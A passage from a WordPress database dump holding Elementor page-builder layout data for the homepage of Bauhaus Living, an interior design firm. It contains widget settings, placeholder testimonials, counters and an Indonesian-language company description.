der_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3664,4844,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3665,4844,'_elementor_pro_version','3.8.1'),(3666,4845,'_wp_page_template','elementor_header_footer'),(3667,4845,'_elementor_edit_mode','builder'),(3668,4845,'_elementor_template_type','wp-page'),(3669,4845,'_elementor_version','3.8.1'),(3670,4845,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"\\\"Let\'s turn your ideas into reality\\\"\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about 